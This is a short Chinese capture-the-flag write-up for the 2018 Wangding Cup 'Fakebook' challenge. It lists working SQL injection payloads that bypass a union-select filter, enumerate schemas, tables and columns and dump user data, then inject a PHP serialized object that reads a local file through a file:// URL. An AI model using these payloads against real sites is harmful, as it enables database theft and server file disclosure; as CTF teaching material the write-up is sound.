[网鼎杯 2018]Fakebook1

打开题目

先创建用户,登录试试

观察网址,这是一道注入的题目

测试注入列数

说明注入列数为4

测试注入点

union select 被过滤

替代?no=0 union all select 1,2,3, 4 %23

2是注入点

爆数据库

?no=0 union all select 1,group_concat(schema_name),3, 4 from

information_schema.schemata %23

爆表名

?no=0 union all select 1,group_concat(table_name),3, 4 from

information_schema.tables where table_schema='fakebook' #

爆字段

?no=0 union all select 1,group_concat(column_name),3, 4 from

information_schema.columns where table_name='users' #

爆数据

?no=0 union all select 1,group_concat(data),3, 4 from fakebook.users #

构造序列化结果

data中的数据

?no=0 union all select 1,group_concat(data),3, 'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from fakebook.users #

最后查看源码,看到base64,解码得到flag

相关推荐
DemonAvenger1 小时前
深入Redis String:从基础到实战,10年经验的后端工程师带你解锁最佳实践
数据库·redis·性能优化
shuair1 小时前
redis大key问题
数据库·redis·缓存
SelectDB1 小时前
Apache Doris 4.0 版本正式发布:全面升级 AI 与搜索能力,强化离线计算
数据库·数据分析·apache
SelectDB1 小时前
从 Snowflake 到 Apache Doris:Planet 实时分析成本直降 80%、查询加速 90 倍
数据库·数据分析·apache
TDengine (老段)2 小时前
TDengine 数学函数 LOG 用户手册
java·大数据·数据库·时序数据库·iot·tdengine·涛思数据
TDengine (老段)2 小时前
TDengine 数据函数 MOD 用户手册
大数据·数据库·物联网·时序数据库·tdengine·涛思数据
文档搬运工2 小时前
Oracle 19.29
数据库·oracle
小小管写大大码2 小时前
AI重排序API:优化搜索相关性
数据库·人工智能
努力学习的少女3 小时前
SpaekSql函数
前端·数据库
张毫洁3 小时前
mysql、oracle的JDBC操作
数据库·mysql·oracle